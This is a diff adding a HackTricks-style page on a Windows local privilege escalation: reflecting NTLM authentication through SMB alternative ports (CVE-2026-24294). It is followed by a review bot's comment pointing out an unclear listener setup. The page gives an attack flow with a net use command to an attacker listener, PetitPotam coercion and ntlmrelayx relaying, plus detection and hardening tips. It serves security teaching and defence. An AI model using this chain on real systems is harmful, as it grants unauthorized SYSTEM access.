| 1 | +# Local NTLM Reflection via SMB Arbitrary Port |
| 2 | + |
| 3 | +{{#include ../../banners/hacktricks-training.md}} |
| 4 | + |
| 5 | +Recent Windows builds introduced **SMB client support for alternative TCP ports**. That feature can be abused to turn **local NTLM authentication** into a **SYSTEM local privilege escalation** when the attacker can: |
| 6 | + |
| 7 | +1. Open an SMB connection to an attacker-controlled listener on a **non-445 port** |
| 8 | +2. Keep that TCP connection alive |
| 9 | +3. Coerce a **privileged local client** to access the **same SMB share path** |
| 10 | +4. Relay the resulting **local NTLM authentication** back to the machine's real SMB service |
| 11 | + |
| 12 | +This is the primitive behind **CVE-2026-24294**, patched in **March 2026**. |
| 13 | + |
| 14 | +## Why it works |
| 15 | + |
| 16 | +The older CMTI / serialized-SPN reflection trick is covered here: |
| 17 | + |
| 18 | +{{#ref}} |
| 19 | +../ntlm/README.md |
| 20 | +{{#endref}} |
| 21 | + |
| 22 | +This newer variant does **not** need a marshalled hostname. Instead it abuses two SMB client behaviours: |
| 23 | + |
| 24 | +- **Alternative port support** on **Windows 11 24H2** and **Windows Server 2025**, exposed to users with `net use \\host\share /tcpport:<port>` |
| 25 | +- **SMB connection reuse / multiplexing**, where multiple authenticated sessions can ride the same TCP connection |
| 26 | + |
| 27 | +That means a low-privileged user can first create a TCP connection from the SMB client to an attacker SMB server on a high port, then coerce a privileged service to access the **exact same UNC path**. If Windows decides to reuse the existing TCP connection, the privileged NTLM exchange is sent over the attacker-controlled transport and can be relayed to the local SMB server. |
| 28 | + |
| 29 | +## Preconditions |
| 30 | + |
| 31 | +- Target supports SMB alternative ports: |
| 32 | + - **Windows 11 24H2** or later |
| 33 | + - **Windows Server 2025** or later |
| 34 | +- The attacker can run a local or remote SMB server on a chosen high port |
| 35 | +- The attacker can coerce a privileged service to access a UNC path |
| 36 | +- The privileged authentication must be **NTLM local authentication** |
| 37 | +- The target must be relayable: |
| 38 | + - Synacktiv reported it worked by default on **Windows Server 2025** |
| 39 | + - Their chain did **not** work on **Windows 11 24H2** because outbound SMB signing is enforced there by default |
| 40 | + |
| 41 | +## Userland and internals |
| 42 | + |
| 43 | +From the command line the feature looks simple: |
| 44 | + |
| 45 | +```cmd |
| 46 | +net use \\192.168.56.3\share /tcpport:12345 |
| 47 | +``` |
| 48 | + |
| 49 | +Programmatically, the client uses `WNetAddConnection4W` with undocumented `lpUseOptions` data. The relevant option is `TraP` (transport parameters), which eventually reaches the kernel SMB client through an FSCTL and is parsed by `mrxsmb`. |
| 50 | + |
| 51 | +Important practical notes: |
| 52 | + |
| 53 | +- **UNC syntax still has no port field** |
| 54 | +- **`net use` is per-logon-session** |
| 55 | +- The bypass still works because **the TCP connection and the SMB session are separate objects** |
| 56 | +- Reusing the **same share path** is mandatory if the exploit depends on the SMB client reusing the previously created TCP connection |
| 57 | + |
| 58 | +## Exploitation flow |
| 59 | + |
| 60 | +### 1. Create the attacker-controlled SMB transport |
| 61 | + |
| 62 | +Run an SMB server on a high port and make Windows connect to it: |
| 63 | + |
| 64 | +```cmd |
| 65 | +net use \\192.168.56.3\share /tcpport:12345 |
| 66 | +``` |
| 67 | + |
| 68 | +The server can accept any credential pair you control, for example `user:user`. The goal of this step is not privilege escalation yet, only to make the Windows SMB client open and keep a reusable TCP connection to your listener. |
| 69 | + |
| 70 | +### 2. Coerce a privileged service to the same UNC path |
| 71 | + |
| 72 | +Use a coercion primitive such as **PetitPotam** against the **same** `\\192.168.56.3\share` path. If the coerced client is privileged and the target name is local (`localhost` or a local IP/host), Windows performs **NTLM local authentication**. |
| 73 | + |
| 74 | +Because the TCP connection is reused, that privileged NTLM exchange travels to the attacker SMB service instead of directly to the real local SMB server. |
| 75 | + |
| 76 | +### 3. Relay the privileged authentication back to local SMB |
| 77 | + |
| 78 | +The attacker-controlled SMB service forwards the privileged NTLM exchange to `ntlmrelayx.py`, which relays it to the machine's real SMB listener and obtains a session as `NT AUTHORITY\SYSTEM`. |
| 79 | + |
| 80 | +Typical tooling from the public writeup: |
| 81 | + |
| 82 | +- `smbserver.py` on a custom port to receive the privileged auth over the reused TCP connection |
| 83 | +- `ntlmrelayx.py` to relay the captured NTLM to local SMB |
| 84 | +- `PetitPotam.exe` or another coercion primitive to force the privileged authentication |
| 85 | + |
| 86 | +## Operator notes |
| 87 | + |
| 88 | +- This is a **local privilege escalation** technique, not a generic remote relay trick |
| 89 | +- The attacker-controlled SMB service must handle the privileged authentication on the **same TCP connection** originally used for the share mount |
| 90 | +- If the coerced access hits a **different share path**, Windows may establish a different connection and the chain breaks |
| 91 | +- SMB signing requirements can kill the relay even when the arbitrary-port step works |
| 92 | +- If you only have Kerberos material or cannot force local NTLM, this exact variant is not enough |
| 93 | + |
| 94 | +## Detection and hardening |
| 95 | + |
| 96 | +- Patch **CVE-2026-24294** from **March 2026 Patch Tuesday** |
| 97 | +- Watch for `net use` or `New-SmbMapping` using **non-default SMB ports** |
| 98 | +- Alert on unusual outbound SMB from workstations or servers to **high TCP ports** |
| 99 | +- Review coercion opportunities such as **EFSRPC / PetitPotam-style** triggers |
| 100 | +- Enforce SMB signing where possible; Synacktiv specifically notes this blocked their relay on Windows 11 24H2 |
| 101 | + |
| 102 | +## References |
| 103 | + |
| 104 | +- [Synacktiv - Bypassing Windows authentication reflection mitigations for SYSTEM shells - Part 1](https://www.synacktiv.com/en/publications/bypassing-windows-authentication-reflection-mitigations-for-system-shells-part-1.html) |
| 105 | +- [Microsoft Learn - Configure alternative SMB ports for Windows Server 2025](https://learn.microsoft.com/en-us/windows-server/storage/file-server/smb-ports) |
| 106 | +- [Microsoft Learn - WNetAddConnection4W](https://learn.microsoft.com/en-us/windows/win32/api/winnetwk/nf-winnetwk-wnetaddconnection4w) |
| 107 | +- [Project Zero - Windows Exploitation Tricks: Trapping Virtual Memory Access (2025 Update)](https://projectzero.google/2025/01/windows-exploitation-tricks-trapping.html) |
| 108 | +- [MSRC - CVE-2026-24294](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-24294) |
| 109 | + |
| 110 | +{{#include ../../banners/hacktricks-training.md}} |
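Review bot: the tooling list under "Relay the privileged authentication back to local SMB" does not match the flow described just above it. Step 3 says the attacker SMB service on the custom port "forwards the privileged NTLM exchange to `ntlmrelayx.py`", but the list names `smbserver.py` as the listener that receives the auth and `ntlmrelayx.py` as a separate relay; a stock `smbserver.py` has no way to hand an in-flight NTLM exchange on an already-open TCP connection to another process, and the "Operator notes" bullet stresses that the privileged auth must be handled on the same TCP connection as the original mount. State plainly which component actually owns the listener on port 12345 (for example `ntlmrelayx.py` bound to the custom port, or a modified server) so the reader can reproduce the chain and defenders know which listener behaviour to look for. Two smaller points: the examples use `\\192.168.56.3\share` throughout while step 2 says local NTLM authentication only occurs when the target name is local, so say explicitly that this address is the victim host's own IP and where the attacker listener runs relative to it; and the Project Zero "Trapping Virtual Memory Access" reference is never cited in the body, so either tie it to the `TraP` option text or drop it.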